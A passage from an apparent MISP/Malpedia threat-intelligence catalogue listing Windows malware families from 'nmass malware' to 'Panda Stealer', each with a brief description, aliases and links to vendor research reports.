https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf

http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/

https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html

https://infosecwriteups.com/part1-static-code-analysis-of-the-rat-njrat-2f273408df43

https://www.4hou.com/posts/VoPM

https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html

https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://blogs.360.cn/post/APT-C-44.html

https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf

https://cybergeeks.tech/just-another-analysis-of-the-njrat-malware-a-step-by-step-approach/

http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf

https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html

https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/

https://github.com/itsKindred/malware-analysis-writeups/blob/master/bashar-bachir-chain/bashar-bachir-analysis.pdf

https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware

https://labs.k7computing.com/?p=21904

https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.njRAT

https://di.sclosu.re/en/njrat-malware-spreading-through-discord-cdn-and-facebook-ads/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt

https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388

http://blogs.360.cn/post/analysis-of-apt-c-37.html

https://cyberandramen.net/2022/01/12/analysis-of-njrat-powerpoint-macros/

https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services

https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/

https://blog.morphisec.com/syk-crypter-discord

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/

https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://unit42.paloaltonetworks.com/njrat-pastebin-command-and-control

https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/

https://www.secureworks.com/research/threat-profiles/copper-fieldstone

https://www.ecucert.gob.ec/wp-content/uploads/2022/03/alerta-APTs-2022-03-23.pdf

https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/

https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel

https://ti.360.net/blog/articles/analysis-of-apt-c-27/

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://news.sophos.com/en-us/2020/05/14/raticate/

https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks

https://blog.reversinglabs.com/blog/rats-in-the-library

https://blog.sonatype.com/bladabindi-njrat-rat-in-jdb.js-npm-malware

https://forensicitguy.github.io/njrat-installed-from-msi/

https://www.trendmicro.com/en_us/research/20/i/wind-up-windscribe-vpn-bundled-with-backdoor.html

https://www.trendmicro.com/en_us/research/23/a/earth-bogle-campaigns-target-middle-east-with-geopolitical-lures.html

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://securelist.com/apt-trends-report-q2-2019/91897/

https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://malwr-analysis.com/2020/06/21/njrat-malware-analysis/

https://intel471.com/blog/privateloader-malware

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt

https://blog.talosintelligence.com/2021/07/sidecopy.html

https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/

https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf

https://asec.ahnlab.com/1369

https://twitter.com/ESETresearch/status/1449132020613922828

https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains

https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf

nmass malware

It’s .NET Rat with harcoded key

The tag is: misp-galaxy:malpedia="nmass malware"

nmass malware is also known as:

Table 4156. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nmass

https://sebdraven.medium.com/a-net-rat-target-mongolia-9c1439c39bc2

Nocturnal Stealer

The tag is: misp-galaxy:malpedia="Nocturnal Stealer"

Nocturnal Stealer is also known as:

Table 4157. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer

https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap

NodeStealer

The tag is: misp-galaxy:malpedia="NodeStealer"

NodeStealer is also known as:

Table 4158. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.node_stealer

https://unit42.paloaltonetworks.com/nodestealer-2-targets-facebook-business/

Nokki

Nokki is a RAT type malware which is believe to evolve from Konni RAT. This malware has been tied to attacks containing politically-motivated lures targeting Russian and Cambodian speaking individuals or organizations. Researchers discovered a tie to the threat actor group known as Reaper also known as APT37.

The tag is: misp-galaxy:malpedia="Nokki"

Nokki is also known as:

Table 4159. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/

NominatusToxicBattery

A wiper that overwrites target files with itself, thus spreading in virus-fashion.

The tag is: misp-galaxy:malpedia="NominatusToxicBattery"

NominatusToxicBattery is also known as:

Table 4161. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nominatus_toxic_battery

https://twitter.com/struppigel/status/1501473254787198977

https://www.trellix.com/en-us/about/newsroom/stories/research/wipermania-an-all-you-can-wipe-buffet.html

Nopyfy

Ransomware

The tag is: misp-galaxy:malpedia="Nopyfy"

Nopyfy is also known as:

Table 4162. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nopyfy

https://labs.k7computing.com/index.php/say-no-to-nopyfy/

NorthStar

An open source C2 framework intended for pentest and red teaming activities.

The tag is: misp-galaxy:malpedia="NorthStar"

NorthStar is also known as:

Table 4163. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.northstar

https://www.mandiant.com/resources/suspected-iranian-actor-targeting-israeli-shipping

Nosu

According to PCrisk, Nosu is the name of a malicious program classified as a stealer. This malware is designed to steal information from infected machines. The Nosu stealer can extract a wide variety of data from devices and installed applications. The most active campaigns associated with Nosu were noted in North and South America, as well as Southeast Asia.

The tag is: misp-galaxy:malpedia="Nosu"

Nosu is also known as:

Table 4164. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nosu

https://www.bitsight.com/blog/cova-and-nosu-new-loader-spreads-new-stealer

Nova Stealer

Nova Stealer is a new information stealer that is offered as Malware-as-a-Service by a new actor called "Sordeal". Its capabilities include password stealing, browser injections, crypto wallet stealing, discord injections, and screen recordings. Parts of its source code have been made available on GitHub, with certain "Premium" features missing.

The tag is: misp-galaxy:malpedia="Nova Stealer"

Nova Stealer is also known as:

  • Malicord

Table 4165. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nova

https://github.com/ElasBlueWHale2/Malicord

https://www.cyfirma.com/outofband/emerging-maas-operator-sordeal-releases-nova-infostealer/

Nozelesn (Decryptor)

The tag is: misp-galaxy:malpedia="Nozelesn (Decryptor)"

Nozelesn (Decryptor) is also known as:

Table 4167. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor

NuggetPhantom

NSFOCUS describes PhantomNugget as a modularized malware toolkit, that was spread using EternalBlue. Payloads included a RAT and a XMRig miner.

The tag is: misp-galaxy:malpedia="NuggetPhantom"

NuggetPhantom is also known as:

Table 4169. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nugget_phantom

https://staging.nsfocusglobal.com/wp-content/uploads/2018/10/NuggetPhantom-Analysis-Report-V4.1.pdf

https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/

Nullmixer

Nullmixer is a dropper/loader for additional malware. It is known to drop a vast amount of different malware, such as info stealers, rats and additional loaders. Samples observed contained up to 8 additional payloads.

The tag is: misp-galaxy:malpedia="Nullmixer"

Nullmixer is also known as:

Table 4170. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nullmixer

https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/

https://www.youtube.com/watch?v=92jKJ_G_6ho

https://www.youtube.com/watch?v=yLQfDk3dVmA

https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1

https://www.youtube.com/watch?v=v_K_zoPGpdk

Numando

According to PCrisk, Numando is a banking trojan written in the Delphi programming language. As the malicious program’s classification implies, it is designed to steal banking information. Numando primarily targets Brazil, with seldom campaigns occurring in Mexico and Spain.

The tag is: misp-galaxy:malpedia="Numando"

Numando is also known as:

Table 4171. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.numando

https://www.welivesecurity.com/2021/09/17/numando-latam-banking-trojan/

https://www.welivesecurity.com/2020/10/01/latam-financial-cybercrime-competitors-crime-sharing-ttps/

Nymaim

Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.

The tag is: misp-galaxy:malpedia="Nymaim"

Nymaim is also known as:

  • nymain

Table 4174. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

https://www.proofpoint.com/us/what-old-new-again-nymaim-moves-past-its-ransomware-roots-0

https://www.virusbulletin.com/conference/vb2017/abstracts/linking-xpaj-and-nymaim

https://www.lawfareblog.com/what-point-these-nation-state-indictments

https://blog.talosintelligence.com/goznym/

https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf

https://bitbucket.org/daniel_plohmann/idapatchwork

https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/

https://www.cert.pl/en/news/single/nymaim-revisited/

https://www.justice.gov/opa/pr/goznym-cyber-criminal-network-operating-out-europe-targeting-american-entities-dismantled

https://www.proofpoint.com/us/threat-insight/post/nymaim-config-decoded

https://securityintelligence.com/posts/goznym-closure-comes-in-the-shape-of-a-europol-and-doj-arrest-operation/

https://www.sentinelone.com/blog/goznym-banking-malware-gang-busted/

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://www.shadowserver.org/news/goznym-indictments-action-following-on-from-successful-avalanche-operations/

https://www2.deloitte.com/content/dam/Deloitte/us/Documents/risk/us-aers-the-evolution-of-the-nymaim-criminal-enterprise.pdf

https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim

https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/

Oblique RAT

The tag is: misp-galaxy:malpedia="Oblique RAT"

Oblique RAT is also known as:

Table 4176. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.oblique_rat

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html

https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques

https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/IoCs_Investigating%20APT36%20or%20Earth%20Karkaddan%20Attack%20Chain%20and%20Malware%20Arsenal.rtf

https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/

https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html

https://www.secrss.com/articles/24995

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf

https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html

https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://securelist.com/transparent-tribe-part-2/98233/

Oceansalt

The tag is: misp-galaxy:malpedia="Oceansalt"

Oceansalt is also known as:

Table 4179. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.oceansalt

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf

OddJob

The tag is: misp-galaxy:malpedia="OddJob"

OddJob is also known as:

Table 4181. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob

Oderoor

Spam bot that was active around 2007 and after, one of the first malware families to use a domain generation algorithm.

The tag is: misp-galaxy:malpedia="Oderoor"

Oderoor is also known as:

  • Bobax

  • Kraken

Table 4182. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.oderoor

https://web.archive.org/web/20160324035554/https://www.johannesbader.ch/2015/12/krakens-two-domain-generation-algorithms//

https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf

Okrum

a new, previously unknown backdoor that we named Okrum. The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors.

The tag is: misp-galaxy:malpedia="Okrum"

Okrum is also known as:

Table 4184. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.okrum

https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/

https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/

https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/

https://securelist.com/apt-trends-report-q3-2020/99204/

OLDBAIT

According to FireEye, OLDBAIT is a credential stealer that has been observed to be used by APT28. It targets Internet Explorer, Mozilla Firefox, Eudora, The Bat! (an email client by a Moldovan company), and Becky! (an email client made by a Japanese company). It can use both HTTP or SMTP to exfiltrate data. In some places it is mistakenly named "Sasfis", which however seems to be a completely different and unrelated malware family.

The tag is: misp-galaxy:malpedia="OLDBAIT"

OLDBAIT is also known as:

  • Sasfis

Table 4185. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.oldbait

https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf

https://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf

https://www.secjuice.com/fancy-bear-review/

Olympic Destroyer

Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event.

The tag is: misp-galaxy:malpedia="Olympic Destroyer"

Olympic Destroyer is also known as:

  • SOURGRAPE

Table 4186. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer

https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat

https://securelist.com/olympic-destroyer-is-still-alive/86169/

https://www.endgame.com/blog/technical-blog/stopping-olympic-destroyer-new-process-injection-insights

https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/

http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html

https://attack.mitre.org/groups/G0034

https://www.virusbulletin.com/virusbulletin/2018/10/vb2018-paper-who-wasnt-responsible-olympic-destroyer/

https://www.youtube.com/watch?v=1jgdMY12mI8

https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/

https://www.lastline.com/labsblog/olympic-destroyer-south-korea/

http://blog.talosintelligence.com/2018/02/olympic-destroyer.html

https://www.lastline.com/labsblog/attribution-from-russia-with-code/

https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too

https://www.youtube.com/watch?v=rjA0Vf75cYk

https://www.wired.com/story/untold-story-2018-olympics-destroyer-cyberattack/

https://www.youtube.com/watch?v=a4BZ3SZN-CI

https://www.mbsd.jp/blog/20180215.html

https://securelist.com/the-devils-in-the-rich-header/84348/

https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://www.youtube.com/watch?v=wCv9SiSA7Sw

https://securelist.com/apt-trends-report-q2-2019/91897/

https://securelist.com/apt-trends-report-q2-2020/97937/

https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/

OnionDuke

OnionDuke is a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites.

The tag is: misp-galaxy:malpedia="OnionDuke"

OnionDuke is also known as:

Table 4189. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke

https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/

https://www.f-secure.com/weblog/archives/00002764.html

https://blog.f-secure.com/podcast-dukes-apt29/

https://www.secureworks.com/research/threat-profiles/iron-hemlock

http://contagiodump.blogspot.com/2014/11/onionduke-samples.html

OnlinerSpambot

A spambot that has been observed being used for spreading Ursnif, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada.

The tag is: misp-galaxy:malpedia="OnlinerSpambot"

OnlinerSpambot is also known as:

  • Onliner

  • SBot

Table 4190. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner

https://www.blueliv.com/blog/research/analysis-spam-distribution-botnet-onliner-spambot/

https://benkowlab.blogspot.com/2017/08/from-onliner-spambot-to-millions-of.html

https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html

https://outpost24.com/blog/an-analysis-of-a-spam-distribution-botnet

OpGhoul

This entry serves as a placeholder of malware observed during Operation Ghoul. The samples will likely be assigned to their respective families. Some families involved and identified were Alina POS (Katrina variant) and TreasureHunter POS.

The tag is: misp-galaxy:malpedia="OpGhoul"

OpGhoul is also known as:

Table 4196. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.opghoul

https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/

OpBlockBuster

The tag is: misp-galaxy:malpedia="OpBlockBuster"

OpBlockBuster is also known as:

Table 4197. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.op_blockbuster

http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequel/

ORANGEADE

FireEye details ORANGEADE as a dropper for the CREAMSICLE malware.

The tag is: misp-galaxy:malpedia="ORANGEADE"

ORANGEADE is also known as:

Table 4198. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.orangeade

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

OrcaRAT

OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions.

The tag is: misp-galaxy:malpedia="OrcaRAT"

OrcaRAT is also known as:

Table 4199. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat

http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html

https://www.secureworks.com/research/threat-profiles/bronze-fleetwood

Orchard

A malware generating DGA domains seeded by the Bitcoin Genesis Block. This family has strong code overlap with win.victorygate.

The tag is: misp-galaxy:malpedia="Orchard"

Orchard is also known as:

  • Antavmu

Table 4200. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.orchard

https://bin.re/blog/a-dga-seeded-by-the-bitcoin-genesis-block/

https://malverse.it/stack-string-decryptor-con-ghidra-emulator-orchard

https://blog.netlab.360.com/orchard-dga/

https://blog.netlab.360.com/a-new-botnet-orchard-generates-dga-domains-with-bitcoin-transaction-information/

Orcus RAT

Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time.

The tag is: misp-galaxy:malpedia="Orcus RAT"

Orcus RAT is also known as:

  • Schnorchel

Table 4201. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat

http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks

https://assets.virustotal.com/reports/2021trends.pdf

https://krebsonsecurity.com/2019/04/canadian-police-raid-orcus-rat-author/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://any.run/cybersecurity-blog/orcus-rat-malware-analysis/

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/

https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html

https://asec.ahnlab.com/en/45462/

https://www.canada.ca/en/radio-television-telecommunications/news/2019/03/crtc-and-rcmp-national-division-execute-warrants-in-malware-investigation.html

https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors

https://blog.checkpoint.com/2019/02/27/protecting-against-winrar-vulnerabilities/

Ordinypt

This malware claims to be a ransomware, but it’s actually a wiper. After execution, this malware terminates a number of processes such as database processes, likely to allow access to any files that these programs may have held open. Ordinypt will avoid wiping certain files and folders in order to prevent the infected machine from becoming unusable. Affected files are overwritten with null character and receive a random 5 character file extension. Finally, shadow copies are removed and Windows startup repair is disabled to complicate recovery of data from the affected system. The desktop background is changed and a ransom note is dropped for the victim. A C2 check-in occurs to keep track of the file extension used on that specific machine, as well as which BitCoin address was randomly provided for payment to the victim (drawn from a long list stored in the ransomware configuration).

The tag is: misp-galaxy:malpedia="Ordinypt"

Ordinypt is also known as:

  • GermanWiper

  • HSDFSDCrypt

Table 4202. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt

https://www.carbonblack.com/2019/09/05/cb-threat-analysis-unit-technical-breakdown-germanwiper-ransomware/

https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://dissectingmalwa.re/tfw-ransomware-is-only-your-side-hustle.html

https://www.gdata.de/blog/2017/11/30151-ordinypt

https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/

OriginBot

OriginBot is a modular information stealer which can also download and execute other malicious payloads.

The tag is: misp-galaxy:malpedia="OriginBot"

OriginBot is also known as:

  • OriginBotnet

  • OriginLoader

Table 4203. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.originbot

https://www.fortinet.com/blog/threat-research/originbotnet-spreads-via-malicious-word-document

OriginLogger

The tag is: misp-galaxy:malpedia="OriginLogger"

OriginLogger is also known as:

Table 4204. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.originlogger

https://unit42.paloaltonetworks.com/originlogger/

http://ropgadget.com/posts/originlogger.html

OutCrypt

Ransomware.

The tag is: misp-galaxy:malpedia="OutCrypt"

OutCrypt is also known as:

Table 4209. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.outcrypt

https://id-ransomware.blogspot.com/2020/07/outcrypt-ransomware.html

OutSteel

According to MITRE, OutSteel is a file uploader and document stealer developed with the scripting language AutoIT that has been used by Ember Bear since at least March 2021.

The tag is: misp-galaxy:malpedia="OutSteel"

OutSteel is also known as:

Table 4211. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.outsteel

https://www.telsy.com/download/6372/?uid=d3eb8e1489

Owowa

Kaspersky describes this as a OWA add-on that has credential stealing capabilities.

The tag is: misp-galaxy:malpedia="Owowa"

Owowa is also known as:

Table 4216. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.owowa

https://securelist.com/owowa-credential-stealer-and-remote-access/105219/

OZH RAT

The tag is: misp-galaxy:malpedia="OZH RAT"

OZH RAT is also known as:

Table 4218. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ozh_rat

https://twitter.com/BushidoToken/status/1266075992679948289

paladin

Paladin RAT is a variant of Gh0st RAT used by PittyPanda active since at least 2011.

The tag is: misp-galaxy:malpedia="paladin"

paladin is also known as:

Table 4221. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin

https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html

https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf

PandaBanker

According to Arbor, Forcepoint and Proofpoint, Panda is a variant of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.

This banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.

The baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.

Panda does have some DGA implemented, but according to Arbor, a bug prevents it from using it.

The tag is: misp-galaxy:malpedia="PandaBanker"

PandaBanker is also known as:

  • ZeusPanda

Table 4222. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker

https://www.youtube.com/watch?v=J7VOfAJvxEY

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much

https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers

https://www.spamhaus.org/news/article/771/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html

https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf

http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware

https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/

http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html

https://medium.com/@crovax/panda-banker-analysis-part-1-d08b3a855847

https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/

https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media

https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/

https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker

Panda Stealer

According to PCrisk, Panda is the name of a malicious program, which is classified as a stealer. It is a new variant of CollectorStealer.

The aim of this malware is to extract and exfiltrate sensitive and personal information from infected devices. Panda primarily targets data relating to cryptocurrency wallets.

This piece of malicious software has been observed being actively distributed via spam campaigns - large-scale operations during which thousands of scam emails are sent. The spam mail proliferating Panda stealer heavily targeted users from the United States, Germany, Japan, and Australia.

